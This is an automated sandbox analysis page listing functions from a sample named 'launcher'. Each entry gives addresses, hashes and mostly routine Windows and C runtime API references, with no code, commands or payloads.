Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aff6252462c5751d12d364bab87c5061629472885f5160b0d999adf94e61afc
Instruction ID: a1fac3ae25e65449bfb4ef228a8aba365ed31fd29964c43788a506fecec46b19
Opcode Fuzzy Hash: 6aff6252462c5751d12d364bab87c5061629472885f5160b0d999adf94e61afc
Instruction Fuzzy Hash: 4F51BF35B18202CFE718CF28E85172AB3E2EF89311F49897CE986D72A5C735D956CB44

Function 00427E01 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 663abff19deead3d27b0807180fa9f860f8e106a4d724c0699514075c3779d44
Instruction ID: 51974d50e2a7817793cb094c231fce960bcf331a61ec050511444b7915a8b576
Opcode Fuzzy Hash: 663abff19deead3d27b0807180fa9f860f8e106a4d724c0699514075c3779d44
Instruction Fuzzy Hash: 01215B3570A220EBD7088B58E890A3EB763EB46304F9A107ED14217A61CB345C02C6EC

Function 0043E910 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 869f7f3c002ba9860916788a763ca6c7ffda5b91efa0847701f6935253ecdb44
Instruction ID: f6c91d3d309d727b414c235dc3744c0c5d4fc8406a4794a606e6b6dbfe825df4
Opcode Fuzzy Hash: 869f7f3c002ba9860916788a763ca6c7ffda5b91efa0847701f6935253ecdb44
Instruction Fuzzy Hash: 6B2179729083156BC7149F1AC88077BF7A6EFC9310F19842DE8D4973A1D731AD0187C8

Function 0041590C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eacc87f18bdac536c7312ce9f3dc46ba50073ab9829e22f8fdb99160f67a4837
Instruction ID: a452ade73fc45fe7ab93c2e10536fdce43e0b1316c69c5106abea9fa65450f3c
Opcode Fuzzy Hash: eacc87f18bdac536c7312ce9f3dc46ba50073ab9829e22f8fdb99160f67a4837
Instruction Fuzzy Hash: 06018EB6D60610CAD724CF20DC81BF77391DBD6311F88452EE985A72A1DB385C82C6DE

Function 004144A7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f97780204d2c3963f647c9bd65354b8eb39fba12d0b0991bc121ce85ebebf3c
Instruction ID: 720ead4ec5acea123e1ca1bed6871759c9059a10e0735184042cf45cc36eede5
Opcode Fuzzy Hash: 5f97780204d2c3963f647c9bd65354b8eb39fba12d0b0991bc121ce85ebebf3c
Instruction Fuzzy Hash: 3F115C79E18320BBD3149F54ED41767B5D2A7C9B00F54952DEB80AB2A5EA748C8086CD

Function 00434010 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: eb3b3d71aa64d90a9daafec15b1dabb60df75f8937f61af26bfb863042916232
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3E110633B051D40EC31A8D3C84006A9BFF30BD7234F19539AE5B89B2E2D6279D8A8359

Function 004292B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
Instruction ID: bab011efe21429cb38e7be9cf31328d0ee16def8f9b74317328d7ffdee7b7dd3
Opcode Fuzzy Hash: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
Instruction Fuzzy Hash: 810171F5B0031297DB209E55A9C172BB6A86F94708F58483EEC0857382DB7DFC05C6AA

Function 0041AA00 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fea3f5891173f0a1b9b925e26ded714425937e2f6e359b2320a0e593260f92
Instruction ID: bccd2aaa42860e02f67c810108acf117a5013b818e88906d9b19657588456e18
Opcode Fuzzy Hash: f7fea3f5891173f0a1b9b925e26ded714425937e2f6e359b2320a0e593260f92
Instruction Fuzzy Hash: 4A01F4305046828BE715CF3A8450273FBE2BFA3310F189599C0D69B382C634A886CB55

Function 00433FF2 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
Instruction ID: 08721261797f70a78f77018cf6cc1c952359d2482d34cef62d213fc780b9f5f0
Opcode Fuzzy Hash: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
Instruction Fuzzy Hash: 5CF04637F040504FC328C83CC4801E9B7B1ABDF320F19169ADA65E7351E225AC018744

Function 0040A370 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279306692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3279306692.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
Instruction ID: fab991da86a26c2a9c27da03b4c86ab671cbe841e0169dec18a15c1602bc3243
Opcode Fuzzy Hash: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
Instruction Fuzzy Hash: 41B0121088C6504981048D00804047AFAF44547002F013149A4C863413C024C1404908

Function 00B5AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00B5AACD,?,?,?,?,?,?,?,?,?,?), ref: 00B5AB88
__alloca_probe_16.LIBCMT ref: 00B5AC43
__alloca_probe_16.LIBCMT ref: 00B5ACD2
__freea.LIBCMT ref: 00B5AD1D
__freea.LIBCMT ref: 00B5AD23
__freea.LIBCMT ref: 00B5AD59
__freea.LIBCMT ref: 00B5AD5F
__freea.LIBCMT ref: 00B5AD6F

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3882b8a66954d979d8799d3e67467dd21fadec0b967466e3732eae9a110292ca
Instruction ID: 6003c4858efcb42f638bd79b9eb4d8a01db44e6be7239b2b2ad2566964d14470
Opcode Fuzzy Hash: 3882b8a66954d979d8799d3e67467dd21fadec0b967466e3732eae9a110292ca
Instruction Fuzzy Hash: 9171193290020A6BDF21AE548C91FAF77FAEF45712F2402E5ED04B7292E775DD098792

Function 00B3FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00B3FE70
__alloca_probe_16.LIBCMT ref: 00B3FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00B3FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B3FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B3FF37
__alloca_probe_16.LIBCMT ref: 00B3FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B3FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B3FFB9

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 5962461bc6b643a4ecf65e971aab4949ee5d685183f275d13437738ff4a18f41
Instruction ID: 6b211f67366e37930afd93bab41f043e1d953b388da31a75694ac20f2225ce8d
Opcode Fuzzy Hash: 5962461bc6b643a4ecf65e971aab4949ee5d685183f275d13437738ff4a18f41
Instruction Fuzzy Hash: B0518872A0121BABEF205F60CC45FBA7BE9EF41754F2444B9FD14EA1A0DB748D149B60

Function 00B4EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B4EEFC

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: bee54ddb00b069e3ec3c16a4f37ca49fe2bdd600b9ef3c824a8d2345d0d1f40d
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: 1DB15472A00256AFEB118F68CC82BBEBBF5EF55310F1441E5E954AB382D674DE01D7A0

Function 00B40D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B40D77
___except_validate_context_record.LIBVCRUNTIME ref: 00B40D7F
_ValidateLocalCookies.LIBCMT ref: 00B40E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B40E33
_ValidateLocalCookies.LIBCMT ref: 00B40E88

Strings

csm, xrefs: 00B40E1D

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cd2eeaac8ab69492e1099da3e0cc8c6b1bb6eaaec423ff55588fbf9f4f1a2c2c
Instruction ID: b4c3e2027bfed7b3ed7c39d4143a0959693d329d4588e51cf948fff325433cb5
Opcode Fuzzy Hash: cd2eeaac8ab69492e1099da3e0cc8c6b1bb6eaaec423ff55588fbf9f4f1a2c2c
Instruction Fuzzy Hash: 4B41A330E10218ABCF10EF68C884A9EBBF5EF44314F1485E5EA145B292D735EB15DB91

Function 00B324B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00B324DD
ShowWindow.USER32(00000000,00000000), ref: 00B324E6
GetCurrentThreadId.KERNEL32 ref: 00B32524

Part of subcall function 00B3F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00B3253A,?,?,00000000), ref: 00B3F129
Part of subcall function 00B3F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00B3253A,?,?,00000000), ref: 00B3F142
Part of subcall function 00B3F11D: CloseHandle.KERNEL32(?,?,?,00B3253A,?,?,00000000), ref: 00B3F154

std::_Throw_Cpp_error.LIBCPMT ref: 00B32567
std::_Throw_Cpp_error.LIBCPMT ref: 00B32578
std::_Throw_Cpp_error.LIBCPMT ref: 00B32589
std::_Throw_Cpp_error.LIBCPMT ref: 00B3259A

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: b11f26057074100128ac869523aefba6e0f4aefbaca4e399d8da5b35f4ecd247
Instruction ID: 77862bf3755937ff247097bacb90d483bdc0342c593b770bde45b8316fbdae7a
Opcode Fuzzy Hash: b11f26057074100128ac869523aefba6e0f4aefbaca4e399d8da5b35f4ecd247
Instruction Fuzzy Hash: AB2174F2D402159BDF10AF949C07B9EBBF4EF04710F2801A5F60877281E7B6A614CBA6

Function 00B4CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00B4D01A,00B31170,00B3AA08,?,?), ref: 00B4CFCC

Strings

api-ms-, xrefs: 00B4CF62
ext-ms-, xrefs: 00B4CF76

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b09722554e27dca859cb9522539c24c351078d73e4adfe8b48222c9131359e57
Instruction ID: 9ee5c572104ed8e7fc90407be2da807402fe4debdb8da7cd53d204c8d7c1f51d
Opcode Fuzzy Hash: b09722554e27dca859cb9522539c24c351078d73e4adfe8b48222c9131359e57
Instruction Fuzzy Hash: 5021EB31B03711ABC7219B65DC80A6A7FE9DB51B60F1501A1F905A72D0EB78EF0CD6D0

Function 00B40080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B40086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00B40094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00B400A5

Strings

GetTempPath2W, xrefs: 00B4009A
GetSystemTimePreciseAsFileTime, xrefs: 00B4008E
kernel32.dll, xrefs: 00B40081

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 9adb19e83b5d4479ac2301d3230078cb469083c5b4be8cf0122ccc3840e5f785
Instruction ID: 9c7155945b14a18ec5d210cbed4912c0ab396fbf338a9a38e433085856b11e9a
Opcode Fuzzy Hash: 9adb19e83b5d4479ac2301d3230078cb469083c5b4be8cf0122ccc3840e5f785
Instruction Fuzzy Hash: D7D09272546A20ABC310AFB4BC4989A3FF9FA09B113018192F881D33E0DFFD85108A94

Function 00B54F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea196d7334a3e840dbc7a4055365d0f47a99c147c3b89293ca6a02937a0c6781
Instruction ID: 12c79a3e9b5f3e5a356f978b55807b2534f109a669337a8e2a8593d2a48242eb
Opcode Fuzzy Hash: ea196d7334a3e840dbc7a4055365d0f47a99c147c3b89293ca6a02937a0c6781
Instruction Fuzzy Hash: 31B1F570E04A49AFDB21DFA9C890BADBBF1EF45306F1441D8E9059B391CB719D45CBA0

Function 00B39B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B39C97
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00B39D06

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: e6c931bafc9b30aafbb6ceed169367079d3a5c85c5de10579396c2f6c422fb46
Instruction ID: b3cce01bf49fbbf50954fd9bee9502c627d0a3fa8df9dd9a6821ef36256579b5
Opcode Fuzzy Hash: e6c931bafc9b30aafbb6ceed169367079d3a5c85c5de10579396c2f6c422fb46
Instruction Fuzzy Hash: 0C41D5B1900740CBDB309B648942BAFB7F8EF45320F3806ADD57A262D1D7B1A904CB52

Function 00B4ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B4ACDE,00B40760,00B3B77F,BB40E64E,?,?,?,?,00B5BFCA,000000FF), ref: 00B4ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4AD1C
SetLastError.KERNEL32(00000000,?,00B4ACDE,00B40760,00B3B77F,BB40E64E,?,?,?,?,00B5BFCA,000000FF), ref: 00B4AD6E

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 44c09bb68e05e9708a29849906f344ce29e83a62fd83ef8d2d359eed35dfe370
Instruction ID: 9b5a764693b71f2c6dbaf90e810334e8677de30a3d295bbbb92cc13670d5b021
Opcode Fuzzy Hash: 44c09bb68e05e9708a29849906f344ce29e83a62fd83ef8d2d359eed35dfe370
Instruction Fuzzy Hash: B101FC3264A615AEA72427787C85D262BD4EB01F7672003BBFA10975F0EF964D46B181

Function 00B4B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B4B68D
CallUnexpected.LIBVCRUNTIME ref: 00B4B906

Strings

csm, xrefs: 00B4B618
csm, xrefs: 00B4B5AB
csm, xrefs: 00B4B6C4

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279426207.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279447103.0000000000B6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279467312.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279486285.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3279521351.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_launcher.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 294ad20053764337042652d7a7a6527bb0bfb172980972f4b2b306d704d1d11a
Instruction ID: d49ddefbf3b799c13f3cd46c6dd43864536b3dd1cc8f7fa4f6cb07d8ff5248b0
Opcode Fuzzy Hash: 294ad20053764337042652d7a7a6527bb0bfb172980972f4b2b306d704d1d11a
Instruction Fuzzy Hash: 71B14571800219EFCF18DFA4C881DAEBBF9EF54310B15459AEA116B212D731DB61EF92

Function 00B3BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3C028

Strings

RCC, xrefs: 00B3BEAB
MOC, xrefs: 00B3BE9F
csm, xrefs: 00B3BEB7

Memory Dump Source

Source File: 00000003.00000002.3279397950.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000003.00000002.3279379524.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
